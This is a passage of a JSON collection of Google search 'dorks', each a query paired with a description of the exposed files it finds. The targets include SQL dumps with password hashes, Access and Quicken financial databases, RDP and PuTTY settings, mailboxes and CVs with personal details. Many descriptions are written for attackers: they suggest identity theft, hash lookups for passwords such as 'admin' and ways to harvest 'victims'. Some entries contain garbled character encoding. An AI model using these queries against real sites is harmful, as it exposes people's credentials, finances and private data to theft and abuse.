attacker can often read all the messages anonymously or even post messages to the folders. In other cases a login will be required. This is a leak of confidential company information and may give hints for social enginering tricks."}, {"dork": "filetype:mny mny", "description": "Microsoft Money 2004 provides a way to organize and manage your personal finances (http://www.microsoft.com/money/). The default file extension for the 'Money Data Files' is *.mny.A free trial version can be downloaded from MS. It is reported that the password protection (linked to passport in the new versions) for these data files can be cracked with a program called \"Passware\"."}, {"dork": "\"# Dumping data for table (username|user|users|password)\"", "description": "sQL database dumps. LOTS of data in these. So much data, infact, I'm pressed to think of what else an ev1l hax0r would like to know about a target database.. What's that? Usernames and passwords you say? Patience, grasshopper..... Note: this is a cleanup version of an older googledork entry."}, {"dork": "intitle:\"Welcome to ntop!\"", "description": "Ntop shows the current network usage. It displays a list of hosts that are currently using the network and reports information concerning the IP (Internet Protocol) traffic generated by each host. An attacker may use this to gather information about hosts and services behind the firewall."}, {"dork": "e-mail address filetype:csv csv", "description": "Loads of user information including email addresses exported in comma separated file format (.cvs). This information may not lead directly to an attack, but most certainly counts as a serious privacy violation."}, {"dork": "inurl:ssl.conf filetype:conf", "description": "The information contained in these files depends on the actual file itself. SSL.conf files contain port numbers, ssl data, full path names, logging information, location of authentication files, and more. Other conf files based on this name may contain similar information. Attackers can use this information against a target in various ways."}, {"dork": "\"sets mode: +p\"", "description": "This search reveals private channels on IRC as revealed by IRC chat logs."}, {"dork": "intitle:\"index of\" +myd size", "description": "The MySQL data directory uses subdirectories for each database and common files for table storage. These files have extensions like: .myd, .myi or .frm. An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database."}, {"dork": "intitle:\"Index Of\" -inurl:maillog maillog size", "description": "This google search reveals all maillog files within various directories on a webserver. This search brings back 872 results to-date, all of which contain various chunks of information (ie. Usernames, email adresses, Login/Logout times of users, IPAdresses, directories on the server ect. ect.)Someone, with this information could dig up info on the server before trying to penetrate it by finding usernames, and email adresses of accounts on the server."}, {"dork": "filetype:ora ora", "description": "Greetings, The *.ora files are configuration files for oracle clients. An attacker can identify a oracle database this way and get more juicy information by searching for ora config files.This search can be modified to be more specific:- filetype:ora sqlnet - filetype:ora names"}, {"dork": "\"allow_call_time_pass_reference\" \"PATH_INFO\"", "description": "Returns publically visible pages generated by the php function phpinfo(). This search differs from other phpinfo() searches in that it doesn't depend on the filename being called \"phpinfo.php\". Some result files that include phpinfo are:"}, {"dork": "inurl:*db filetype:mdb", "description": "More Microsoft Access databases for your viewing pleasure. Results may vary, but there have been passwords discovered with this search."}, {"dork": "filetype:cfg auto_inst.cfg", "description": "Mandrake auto-install configuration files. These contain information about the installed packages, networking setttings and even user accounts."}, {"dork": "(inurl:\"robot.txt\" | inurl:\"robots.txt\" ) intext:disallow filetype:txt", "description": "Webmasters wanting to exclude search engine robots from certain parts of their site often choose the use of a robot.txt file on the root of the server. This file basicly tells the bot which directories are supposed to be off-limits.An attacker can easily obtain that information by very simply opening that plain text file in his browser. Webmasters should *never* rely on this for real security issues. Google helps the attacker by allowing a search for the \"disallow\" keyword."}, {"dork": "intext:\"Session Start * * * *:*:* *\" filetype:log", "description": "These are IRC and a few AIM log files. They may contain juicy info or just hours of good clean newbie bashing fun."}, {"dork": "ext:asp inurl:pathto.asp", "description": "The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so:CAUTIONS Do not leave pathto.asp or ubb6_test.cgi on your server. Delete them from the server when you are done. Leaving them in place poses a security risk.\"This searches pathto.asp files and allows an attacker to know the exact installed path of the software.Examples:The path to your Site is -- g:\\0E5\\goldenstateeng.xxx\\webThe path to your Site is -- D:\\inetpub\\wwwroot\\01xx738\\mc10s9izz"}, {"dork": "\"phone * * *\" \"address *\" \"e-mail\" intitle:\"curriculum vitae\"", "description": "This search gives hounderd of existing curriculum vitae with names and adress. An attacker could steal identity if there is an SSN in the document."}, {"dork": "filetype:QDF QDF", "description": "The QDATA.QDF file (found sometimes in zipped \"QDATA\" archives online, sometimes not) contains financial data, including banking accounts, credit card numbers, etc. This search has only a couple hits so far, but this should be popular in the coming year as Quicken 2005 makes it very easy and suggests to backup your data online."}, {"dork": "( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject", "description": "storing emails in your webtree isnt a good idea.with this search google will show files containing emails like mail,eml,mbox or mbx with the keywords\"password\" or \"subject\" in the mail data."}, {"dork": "filetype:qbb qbb", "description": "This search will show QuickBooks Bakup Files. Quickbook is financial accounting software so storing these files in a webtree is not a smart idea."}, {"dork": "filetype:bkf bkf", "description": "This search will show backupfiles for xp/2000 machines.Of course these files could contain nearly everything, depending on the user selection and they can also be password protected."}, {"dork": "inurl:snitz_forums_2000.mdb", "description": "The SnitzTM Forums 2000 Version 3.4.04 Installation Guide and Readme says: \"it is strongly recommended that you change the default database name from snitz_forums_2000.mdb to a cryptic or not easy to guess name.\"Of course, we know readme's are for lamers.. right admins ?[murfie@forofo googledorks]$ mdb-export snitz_forums_2000.mdb FORUM_MEMBERSMEMBER_ID,M_STATUS,M_NAME,M_USERNAME,M_PASSWORD,M_EMAIL, [etc]1,1,\"adminadmin\",\"58180bb12beb55a4bffbxxde75cxxc53dcc8061c3cdee52e0ebdcd74049d374e\",\"yourmail@server.com\",\" \",\" \",\"\",\"\",1,1,1,3,\" \",\" \",\" \",\"20030918120147\",2,\"20030918120207\",\"20030918120224\",\"Forum Admin\",\"10.xx.xx.72\",0,0,1,\"000.000.000.000\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\" \",\" \",\"\",\"\",\" \",\"\",\"\",\"\",\"\",1(data xx'd at some points) The password hash value is a SHA256 encoded string (with no salting). Every attacker knows they can be broken with a dictionary attack using a very simpel perl or C program.http://murfnet.xs4all.nl/public/scripts/perl/desnitz.txt"}, {"dork": "filetype:rdp rdp", "description": "These are Remote Desktop Connection (rdp) files. They contain the settings and sometimes the credentials to connect to another windows computer using the RDP protocols."}, {"dork": "filetype:reg \"Terminal Server Client\"", "description": "These are Microsoft Terminal Services connection settings registry files. They may sometimes contain encrypted passwords and IP addresses."}, {"dork": "filetype:pot inurl:john.pot", "description": "John the Ripper is a popular cracking program every hacker knows. It's results are stored in a file called john.pot.This search finds such results files, currently only one. Also No results for the distributed john version (djohn.pot) today :)PS: This was posted to the \"fun\" forum, so don't take this too seriously !"}, {"dork": "filetype:pdb pdb backup (Pilot | Pluckerdb)", "description": "Hotsync database files can be found using \"All databases on a Palm device, including the ones you create using NS Basic/Palm, have the same format. Databases you create using NS Basic/Palm have the backup bit set by default, so they are copied to your \"x:\\palm\\{username}\\backup\"The forum members suggested adding Pilot and Pluckerdb (linux software for pda), so the results are more clean. (pdb files can be used for protein databases, which we don't want to see).Currently we don't know of a program to \"read\" these binary files."}, {"dork": "filetype:asp DBQ=\" * Server.MapPath(\"*.mdb\")", "description": "This search finds sites using Microsoft Access databases, by looking for the the database connection string. There are forums and tutorials in the results, but also the real databases. An attacker can use this to find the name and location of the database and download it for his viewing pleasure, which may lead to information leakage or worse."}, {"dork": "inurl:\"/names.nsf?OpenDatabase\"", "description": "This search will return any Lotus Domino address books which may be open to the public. This can contain a lot of detailed personal info you don't want to fall in the hands of your competitors or hackers. Most of them are password protected."}, {"dork": "ext:log \"Software: Microsoft Internet Information Services *.*\"", "description": "Microsoft Internet Information Services (IIS) has log files that are normally not in the docroot, but then again, some people manage to share them. An attacker may use these to gather: loginnames (FTP service), pathinformation, databasenames, and stuff..Examples:12:09:37 194.236.57.10 [2501]USER micze 33112:09:38 194.236.57.10 [2501]PASS - 23008:30:38 194.236.57.10 [2416]DELE com-gb97.mdb2000-06-18 15:08:30 200.16.212.225 activeip\\carpinchos 4.22.121.13 80 POST /_vti_bin/_vti_aut/author.dll - 200 2958 551 120 MSFrontPage/4.0 -"}, {"dork": "filetype:vcs vcs", "description": "Filext.com says: \"Various programs use the *.VCS extension; too many to list individually. Take clues from the location of the file as a possible pointer to exactly which program is producing the file. The file's date and time can also help if you know which programs you were running when the file was written.\"The most common use is the \"vCalendar File\", used by Outlook for example. It can also belong to a \"Palm vCal Desktop Application\". For those who prefer clean searches, try these variations (with less results):\"PRODID: PalmDesktop Generated\"filetype:vcs VCALENDAR filetype:vcs BEGIN:VCALENDAR"}, {"dork": "filetype:pst inurl:\"outlook.pst\"", "description": "All versions of the popular business groupware client called Outlook have the possibility to store email, calenders and more in a file for backup or migration purposes.An attacker may learn a great deal about the owner or the company by downloading these files and importing them in his own client for his viewing pleasure."}, {"dork": "ext:ldif ldif", "description": "www.filext.com says LDIF = LDAP Data Interchange Format.LDAP is used for nearly everything in our days, so this file may include some juice info for attackers. They can add INTEXT:keyword to get more specific targets."}, {"dork": "inurl:/_layouts/settings", "description": "With the combined collaboration features of Windows SharePoint Services and SharePoint Portal Server 2003, users in an organization can create, manage, and build collaborative Web sites and make them available throughout the organization. More information is available at : http://www.microsoft.com/sharepoint/Loads of company info can be gained by an attacker when the URL's are unprotected. Furthermore unprotected sharepoint sites give full \"Edit, Add and Delete access\" to the information, which in case of malicious users may cause loss of important data."}, {"dork": "+\":8080\" +\":3128\" +\":80\" filetype:txt", "description": "With the string [+\":8080\" +\":3128\" +\":80\" filetype:txt] it is possible to find huge lists of proxies... So, I've written a simple shell script that checks these lists and filters out the not responding proxies. It also stores time response in another file, so you can choose only fast proxies. Furthermore it can control the zone of the proxy with a simple whois grep... The script proxytest.sh is on my website:http://rawlab.relay.homelinux.net/programmi/proxytest.sh"}, {"dork": "intext:SQLiteManager inurl:main.php", "description": "sQLiteManager is a tool Web multi-language of management of data bases SQLite. # Management of several data base (Creation, access or upload basic) # Management of the attached bases of donn\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00a8es # Creation, modification and removal of tables and index. # Insertion, modification, suppression of recording in these tables"}, {"dork": "inurl:odbc.ini ext:ini -cvs", "description": "This search will show the googler ODBC client configuration files which may contain usernames/databases/ipaddresses and whatever."}, {"dork": "intitle:\"ASP Stats Generator *.*\" \"ASP Stats Generator\" \"2003-2004 weppos\"", "description": "ASP Stats Generator is a powerful ASP script to track web site activity. It combines a server side sniffer with a javascript system to get information about clients who are visiting your site."}, {"dork": "\"Installed Objects Scanner\" inurl:default.asp", "description": "Installed Objects Scanner makes it easy to test your IIS Webserver for installed components. Installed Objects Scanner also has descriptions and links for many components to let you know more on how using those components. Just place the script on your server and view it in your browser to check your server for all currently known components."}, {"dork": "ext:ini intext:env.ini", "description": "This one shows configuration files for various applications. based on the application an attacker may find information like passwords, ipaddresses and more."}, {"dork": "ext:mdb inurl:*.mdb inurl:fpdb shop.mdb", "description": "The directory \"http:/xxx/fpdb/\" is the database folder used by some versions of FrontPage. It contains many types of Microsoft Access databases.One of them is Metacart, who used \"shop.mdb\" as their default name. It contains customer info like phone numbers but also plain text passwords. A screenshot is available at ImageShack: http://img49.exs.cx/img49/7673/shopmdb.jpgThree results only at time of writing. Remove the shop.mdb part to see the complete list of databases."}, {"dork": "inurl:cgi-bin/testcgi.exe \"Please distribute TestCGI\"", "description": "Test CGI by Lilikoi Software aids in the installation of the Ceilidh discussion engine for the World Wide Web. An attacker can use this to gather information about the server like: Operating System, IP and the full docroot path."}, {"dork": "intitle:\"index.of *\" admin news.asp configview.asp", "description": "With Compulive News you can enter the details of your news items onto a webform and upload images through your browser. It integrates seamlessly within your website.When you open your CNU5 zip there is a news folder created with three subfolders: htmlarea, images and admin. In the news folder is your database file \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u2039\u00c5\u201cnews.mdb\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2.For security purposes the manual recommends that you immediately rename this database to a name of your own choosing thereby making it harder for anyone to download your news database.The database contains the plain text password. PS: this search is based on the index.of method. There are other ways to find this software, but finding the news database becomes a lot more difficult for an attacker that way."}, {"dork": "ext:nsf nsf -gov -mil", "description": "Domino is server technology which transforms Lotus Notes\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet.This is a generic search for Lotus Domino files. It identifies Domino users. Search the GBDB for more variations on this theme."}, {"dork": "inurl:log.nsf -gov", "description": "Domino is server technology which transforms Lotus Notes\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet. This search finds Domino log files. These can be revealing, including information about dbconnect.nsf files, path information, etc.Example: * Database-Sizes * Database-Usage * Mail Routing Events * Miscellaneous Events * NNTP Events * Object Store Usage * Passthru Connections * Phone Calls-By Date * Phone Calls-By User * Replication Events * Sample Billing * Usage-By Date * Usage-By UserExample:2004/04/14 07:51:00 AM ATTEMPT TO ACCESS DATABASE mtstore.ntf by itisdom/ITIS/ITRI was denied"}, {"dork": "intitle:\"Index of\" upload size parent directory", "description": "Files uploaded through ftp by other people, sometimes you can find all sorts of things from movies to important stuff."}, {"dork": "intitle:\"Web Server Statistics for ****\"", "description": "These are www analog webstat reports. The failure report shows information leakage about database drivers, admin login pages, SQL statements, etc."}, {"dork": "filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net", "description": "PHP iCalendar is a php-based iCal file parser. Its based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigationThis reveals the RSS info for the user calendars."}, {"dork": "filetype:inf inurl:capolicy.inf", "description": "The CAPolicy.inf file provides Certificate Servicces configuration information, which is read during initial CA installation an whenever you renew a CA certificate. The CApolicy.inf file defines settings specific to root CAs, as well as settings that affect all CAs in the CA hierarchiy."}, {"dork": "\"Certificate Practice Statement\" inurl:(PDF | DOC)", "description": "Certificate Practice Statement (CPS)A CPS defines the measures taken to secure CA operation and the management of CA-issued certificates. You can consider a CPS to be an agreement between the organization managing the CA and the people relying on on the certificates issued by the CA."}, {"dork": "ext:conf NoCatAuth -cvs", "description": "NoCatAuth configuration file. This reveals the configuration details of wirless gateway including ip addresses, device names and pathes."}, {"dork": "ext:cgi inurl:editcgi.cgi inurl:file=", "description": "This was inspired by the K-Otic report. Only two results at time of writing. The cgi script lets you view any file on the system, including /etc/.. (guess it ;)http://www.k-otik.com/exploits/08242004.Axis.sh.php"}, {"dork": "filetype:ns1 ns1", "description": "Netstunbler files contain information about the wireless network. For a cleanup add stuff like: +\"Creator\" +\"Format\" +\"DateGMT\"."}, {"dork": "filetype:config web.config -CVS", "description": "Through Web.config an IIS adminstrator can specify settings like custom 404 error pages, authentication and authorization settings for the Web site. This file can hold a plaintext password in the worst case or just reveil the full path info on a 404 error."}, {"dork": "filetype:myd myd -CVS", "description": "MySQL stores its data for each database in individual files with the extension MYD.An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database."}, {"dork": "intitle:\"PhpMyExplorer\" inurl:\"index.php\" -cvs", "description": "PhpMyExplorer is a PHP application that allows you to easily update your site online without any FTP access. A security vulnerability in the product allows attackers to view and read files that reside outside the normal bound directory."}, {"dork": "intitle:\"Apache::Status\" (inurl:server-status | inurl:status.html | inurl:apache.html)", "description": "The Apache::Status returns information about the server software, operating system, number of child processes and current visitors. The official documentation can be found at hxxp://search.cpan.org/~gozer/mod_perl-1.29/lib/Apache/Status.pm"}, {"dork": "\"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)\" ext:log", "description": "This file spills a lot of juicy info... in some cases, passwords in the raw dump, but not in any I've found this time around. However, with a computer name, a user name, and various other nuggets of info, this one file seems to sketch the system pretty well."}, {"dork": "inurl:report \"EVEREST Home Edition \"", "description": "Well what can be said about this one, I've added it to the DB under Juicy info, however it could have easilly gone under virtually any of the lists as it just give out Soooo much info. I can for instance find out the admin username (not just the adin every user) and also if it password protected and if the password ever expires plus is it a current user account, also do the same for any guest accounts, Ok nice and easy how about the O/S and all the Mapped Drive locations all there along with installed software and even currently running applications and processes. Site admins would have to be mad to leave this stuff open, but as we all know from the GHDB Site admins do weird and funny stuff. This one just gives out to much to list, so go have a look and see what you can find."}, {"dork": "intitle:\"DocuShare\" inurl:\"docushare/dsweb/\" -faq", "description": "some companies use a Xerox Product called DocuShare. The problem with this is by default guest access is enabled and it appears a lot of companies either don't care or don't know."}, {"dork": "intitle:\"PHP Advanced Transfer\" (inurl:index.php | inurl:showrecent.php )", "description": "PHP Advacaned Transfer is GPL'd software that claims to be the \"The ultimate PHP download & upload manager\". This is a search for the main and recently changed files pages."}, {"dork": "ext:gho gho", "description": "Norton Ghost allows administrators to create hard rive images for lots of purposes including backup, migration, etc. These files contain the hard drive images which can be restored to create an exact duplicate of a hard drive, which could contain just about anything!"}, {"dork": "ext:pqi pqi -database", "description": "PQ DriveImage allows administrators to create hard rive images for lots of purposes including backup, migration, etc. These files contain the hard drive images which can be restored to create an exact duplicate of a hard drive, which could contain just about anything!"}, {"dork": "ext:vmdk vmdk", "description": "VMWare allows PC emulation across a variety of platforms. These files are VMWare disk images which essentially contain a copy of an entire PC, which could contain almost anything."}, {"dork": "ext:vmx vmx", "description": "VMWare allows PC emulation across a variety of platforms. Theseconfiguration files describe a virtual PC, and reveal information about that PC's hardware settings."}, {"dork": "inurl:\"/axs/ax-admin.pl\" -script", "description": "This system records visits to your site. This admin script allows you to display these records in meaningful graph and database formats."}, {"dork": "\"Generated by phpSystem\"", "description": "PhpSystem shows info about unix systems, including: General Info (kernel, cpu, uptime), Connections, Who Is Logged In, Memory, Swap and active mounts."}, {"dork": "ext:dat bpk.dat", "description": "Perfect Keylogger is as the name says a keylogger :)This dork finds the corresponding datafiles which can be read with the free downloadable lite version."}, {"dork": "inurl:ds.py", "description": "Affordable Web-based document and content management application lets businesses of every size rapidly deploy a world-class Enterprise Content Management (ECM) solution to help reduce costs, optimize information flow, and reduce risk"}, {"dork": "ext:conf inurl:rsyncd.conf -cvs -man", "description": "rsync is an open source utility that provides fast incremental file transfer.rsync can also talk to \"rsync servers\" which can provide anonymous or authenticated rsync.The configuration files contain data about peers and paths"}, {"dork": "inurl:preferences.ini \"[emule]\"", "description": "This finds the emule configuration file which contains some general and proxy information.Sometimes proxy user and password are stored."}, {"dork": "intitle:\"welcome.to.squeezebox\"", "description": "squeezebox is the easiest way for music lovers to enjoy high-quality playback of their whole digital music collection. Stream music from your computer to anywhere in your home. Works with iTunes and provides a powerful web interface for control from any computer on your network.This is neat, on top of giving out all sorts of enumeration information, it also allows one to paruse the music collection on the box, as well as listen if you install the aplet. Way cool."}, {"dork": "filetype:cnf inurl:_vti_pvt access.cnf", "description": "The access.cnf file is a \"weconfigfile\" (webconfig file) used by Frontpage Extentions for Unix. The install script called change_server.sh processes them. These files leak information about the realm name and the full path on the server for it."}, {"dork": "intitle:\"index.of\" .diz .nfo last modified", "description": "File_id.diz is a description file uploaders use to describe packages uploaded to FTP sites. Although rooted in legitimacy, it is used largely by software piracy groups to describe their ill gotten goods. Systems administrators finding file_id.diz in directory listings on their servers may discover their boxes have been hacked and are being used as a distroubtion site for pirated software. .nfo's often contain info on which piracy group the files have passed through on their way to their final resting place. This helps weed out false positives."}, {"dork": "intext:gmail invite intext:http://gmail.google.com/gmail/a", "description": "This is a dork I did today. At first, I wanted to find out the formula for making one, but ... It got boring, so I just made a dork that finds invites. If you want to get specific, try adding \"+blog\", \"+livejournal\", or , \"+forum\"."}, {"dork": "intitle:\"FTP root at\"", "description": "This dork will return some FTP root directories. The string can be made more specific by adding additional keywords like password."}, {"dork": "ext:txt inurl:dxdiag", "description": "This will find text dumps of the DirectX Diag utility. It gives an outline of the hardware of the computer, and goes into quite a bit of detail listing driver versions and such. I can't think of any serious security implacations of this data, but I'll leave it to your imagination."}, {"dork": "ext:reg \"username=*\" putty", "description": "Putty registry entries. Contain username and hostname pairs, as well as type of session (sftp, xterm, etc)."}, {"dork": "intitle:\"edna:streaming mp3 server\" -forums", "description": "Edna allows you to access your MP3 collection from any networked computer. This software streams your MP3s via HTTP to any MP3 player that supports playing off a remote connection (e.g. Winamp, FreeAmp, Sonique, XMMS).Stats pages were found (by klouw) with:\"edna:*\" intitle:\"edna: Site Statistics\""}, {"dork": "inurl:netscape.ini", "description": "There's a bunch of interesting info in netscape.ini1. Viewers: which multimedia viewers the firm or people are using2.Cookies3.Address Book4.Mail- If pop3 is used you will see login and password. 5.Java - will tell the attacker if his victim has Java enabled.6.URL History - The last sites visitedURL_1=http://edtech.xxxx.fi/URL_2=C:\\Tx\\ixxx_t3.htmURL_3=http://www.xxx.com/welcome/URL_4=http://xxx.netscape.com7.User Trusted External Applications"}, {"dork": "inurl:netscape.hst", "description": "Netscape Bookmark List/History: So an attacker would be able to locate the bookmark and history list"}, {"dork": "inurl:netscape.hst", "description": "History for Netscape - So an attacker can read a user's browsing history."}, {"dork": "-site:php.net -\"The PHP Group\" inurl:source inurl:url ext:pHp", "description": "scripts to view the source code of PHP scripts running on the server. Can be very interesting if it is also allowed to open configuration files ;-)"}, {"dork": "+\"HSTSNR\" -\"netop.com\"", "description": "This search reveals NetOp license files. From the netop website: \"NetOp Remote Control is the most comprehensive, effective and security-conscious way to maintain your IT operations. Designed to fit into all environments, NetOp lets you access users running virtually any operating system, including Windows, Linux, Mac OS X and Solaris. Location isn\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2t terribly important either. The program offers unrivalled connectivity, supporting all standard communication protocols. Finally, NetOp is also the ideal way to manage and administrate your servers. The system contains a sweeping range of remote management tools, all available on one easy-to-use console.\""}, {"dork": "inurl:getmsg.html intitle:hotmail", "description": "These pages contain hotmail messages that were saved as HTML. These messages can contain anything from personal data to cleartext passwords."}, {"dork": "filetype:ora tnsnames", "description": "This searches for tns names files. This is an Oracle configuration file that sets up connection strings for someone's Oracle client to contact the various databases it is managing. This file contains ports, IP's and server names of these database machines. What I think is more telling is that in most cases, this file is stored in Oracle's installation directory which can probably be more telling."}, {"dork": "\"#mysql dump\" filetype:sql 21232f297a57a5a743894a0e4a801fc3", "description": "this is a mod of one of the previous queries posted in here. the basic thing is, to add this:21232f297a57a5a743894a0e4a801fc3to your query, that oryginally results in a username lists with a MD5 encrypted password.this one finds mysql dumps with for a users who's passwordsare \"admin\" :)the \"21232f297a57a5a743894a0e4a801fc3\" is md5 result for \"admin\"you can try it with other queris on this site.use also:63a9f0ea7bb98050796b649e85481845 for root098f6bcd4621d373cade4e832627b4f6 for test3c3662bcb661d6de679c636744c66b62 for sexf561aaf6ef0bf14d4208bb46a4ccb3ad for xxxif you'll get lucky, you'll get a username, and a encryoted password, witch is the one above that u used.remember, that this works for all files that contain plaintex username and md5 encrypted passwords. use this techniq with other queris that you'll find hereuff... i hope i made my self clear."}, {"dork": "allinurl:\"weblog/referrers\"", "description": "ExpressionEngine is a modular, flexible, feature-packed web publishing system that adapts to a broad range of needs."}, {"dork": "\"MacHTTP\" filetype:log inurl:machttp.log", "description": "MacHTTP is an webserver for Macs running OS 6-9.x. It's pretty good for older Macs but the default install leaves the MacHTTP.log file open to access."}, {"dork": "ext:ics ics", "description": "ICalender Fileder that can contain a lot of useful information about a possible target."}, {"dork": "ext:plist filetype:plist inurl:bookmarks.plist", "description": "These Safari bookmarks that might show very interesting info about a user's surfing habits"}, {"dork": "ext:jbf jbf", "description": "There is a full path disclosure in .jbf files (paint shop pro), which by itself is not a vulnerability, but it becomes interesting when uploaded or used on webservers. Use a tool like 'strings' to read the ascii parts, the path is on the top of the file."}, {"dork": "inurl:XcCDONTS.asp", "description": "This query reveals an .asp script which can often be used to send anonymous emails from fake senders. When combined with a proxy, the usefulness of these scripts is obvious!"}, {"dork": "filetype:QBW qbw", "description": "Quickbooks is software to manage your business's financials. Invoicing, banking, payroll, etc, etc. Its a nice software package but their files (.qbw) are simply password protected in most cases and online programs may be available to remove password protection. SSNs (depending on the company), account numbers of employees for direct deposit, customer lists, etc may be available. This could lead to identity theft, or worse..."}, {"dork": "filetype:PS ps", "description": "PS is for \"postscript\"...which basically means you get the high quality press data for documents. Just run 'adobe distiller' or alike to produce a readable PDF. Found items include complete books as sold on amazon, annual reports and even juicier stuff."}, {"dork": "site:www.mailinator.com inurl:ShowMail.do", "description": "Mailinator.com allows people to use temporary email boxes. Read the site, I won't explain here. Anyway, there are emails in this site that have no password protection and potentially contain usernames, passwords, and email data. The only lock against unwanted viewers is the email address which can be randomized."}, {"dork": "intitle:\"curriculum vitae\" filetype:doc", "description": "Hello. 1. It reveals personal datas, often private addresses, phone numbers, e-mails, how many children one has:). Full curriculum vitae. I tried many verions of it:inurl:\"pl\" intitle:\"curriculum vitae\" filetype:docinurl:\"uk\" intitle:\"curriculum vitae\" filetype:docinurl:\"nl\" intitle:\"curriculum vitae\" filetype:doc, etc. in order to get national results,alsointitle:\"curriculum vitae\" ext:(doc | rtf )However filetype:doc version gives the most results. 2. You can always do someting with someone phone number, date and place of birth, etc. I placed this string in the forum, but nobody answered me :(. GreetingsphilYps. you have something similar in your GHDB, but different.\"Click here for the Google search ==> \"phone * * *\" \"address *\" \"e-mail\" intitle:\"curriculum vitae\"(opens in new window)Added: Thursday, August 19, 2004hits: 24771\""}, {"dork": "contacts ext:wml", "description": "Forget Bluetooth Hacking! You'll be amazed, at how many people sync their Cell Phones to the same Computers they run some type of Server on. This Query literally gives you access to peoples private contact lists that are ether on there Smart Phones', or on their Windows CE wireless devices.An attacker could Spoof Emails with the \"SIG\" details of the persons Phone firmware, or simply collect the cellular numbers for something later on down the road.I even hypotheticlly came across some private text messages!"}, {"dork": "rdbqds -site:.edu -site:.mil -site:.gov", "description": "Ceasar encryption is a rather simple encryption. You simply shift letters up or down across the entire length of the message... In the url I did this with the word \"secret\" which equals rdbqds.. (1 char shift).It appears that protected PDF documents use this very encryption to protect its documents. At least one version of adobe acrobat did. A big thank you to Golfo for the links he provided in the forum to assist.http://www.math.cankaya.edu.tr/~a.kabarcik/decrypt.html http://www.math.cankaya.edu.tr/~a.kabarcik/encrypt.html"}, {"dork": "inurl:wp-mail.php + \"There doesn't seem to be any new mail.\"", "description": "This is the WordPress script handling Post-By-Email functionality, the search is focussed on the message telling that there's nothing to process.If the script *does* have anything to progress, it will reveal the email-address of account that sent the message(s)."}, {"dork": "\"not for public release\" -.edu -.gov -.mil", "description": "if you search through lots of these then you find some really juicy things, there files from police, airports, government companies all kind of stuff that is not meant to be seen by normal people."}, {"dork": "intitle:\"Joomla - Web Installer\"", "description": "Joomla! is a Content Management System (CMS) created by the same team that brought the Mambo CMS. This dork finds the Web Installer page. On newer versions, after you install, joomla asks to delete installation dir before to be functional.The Webinstaller gives an attacker information about the php configuration and rgod has even found a way to inject data into the configuration.php file, resulting in a DoS attack (see the forums for more info).The admin logon can be found searching: intitle:\"- Administration [Joomla]\" but there are no default passwords."}, {"dork": "(intitle:\"PRTG Traffic Grapher\" inurl:\"allsensors\")|(intitle:\"PRTG Traffic Grapher - Monitoring Results\")", "description": "PRTG Traffic Grapher is Windows software for monitoring and classifying bandwidth usage. It provides system administrators with live readings and long-term usage trends for their network devices. The most common usage is bandwidth usage monitoring, but you can also monitor many other aspects of your network like memory and CPU utilizations."}, {"dork": "inurl:configuration.php-dist", "description": "locates the default configuration file of JOOMLA Author: ScOrPiOn"}, {"dork": "inurl:\"config.php.new\" +vbulletin", "description": "locates the default configuration file for vBulletin (/includes/config.php.new) Author: MaXe"}, {"dork": "inurl:phpinfo.php", "description": "Locates phpinfo files. A phpinfo file Outputs a large amount of information about the current state of PHP. This includes information about PHP compilation options and extensions, the PHP version, server information and environment , the PHP environment, OS version information, paths, master and local values of configuration options, HTTP headers, and the PHP License. Author: ScOrPiOn"}, {"dork": "allinurl:/xampp/security.php", "description": "XAMPP Security Setting Page Information Disclosure. Author: modpr0be"}, {"dork": "inurl:app/etc/local.xml", "description": "Magento local.xml sensitive information disclosure\nAuthor: Rambaud Pierre"}, {"dork": "allinurl:http://www.google.co.in/latitude/apps/badge/api?user=", "description": "Site: google.com/latitude - This is a free application where you can track\nyour PC, laptop and mobile, just login there and you will be tracked\nfreely(used to track yourself live and you can put this in blogs to show\nwhere you are)\nI made a dork simply that shows some couple of people, after some years when\nthis application will grow stronger and you can get tons of victims.\n*allinurl:http://www.google.co.in/latitude/apps/badge/api?user=*\nBy *The ALLSTAR*"}, {"dork": "filetype:xls + password + inurl:.com", "description": "The filetype:xls never changes\nWhat is inbtween then + sings can be what ever you are looking for\ntaxid\nssn\npassword\nStudent ID\netc\nThe inurl: can be changed to what you want\n.gov\n.edu\n.com\netc.\nTake care,\nRedShift"}, {"dork": "inurl:sarg inurl:siteuser.html", "description": "Submitter: pipefish \nSquid User Access Reports that show users' browsing history through\nthe proxy. Shows internal IP space sometimes, usernames as well, and can\nbe helpful when planning a pen test (spear phishing\\social engineering\ncampaign etc.) It also helps to ID an organization's proxy server."}, {"dork": "site:dl.dropbox.com filetype:pdf cv OR curriculum vitae OR resume", "description": "Searches Dropbox for publicly avaliable PDF's containing information used in\na CV/Resume/Curriculum Vitae which can therefore be used in a Social\nEngineering based vector attack.\nAuthor: Trevor Starick"}, {"dork": "site:docs.google.com intitle:(cv Or resume OR curriculum vitae)", "description": "Searches GoogleDocs for publicly avaliable PDF's containing information used in\na CV/Resume/Curriculum Vitae which can therefore be used in a Social\nEngineering based vector attack.\n--\nTrevor Starick"}, {"dork": "site:mediafire.com cv Or resume OR curriculum vitae filetype:pdf OR doc", "description": "Searches Mediafire for publicly avaliable PDF's containing information used in\na CV/Resume/Curriculum 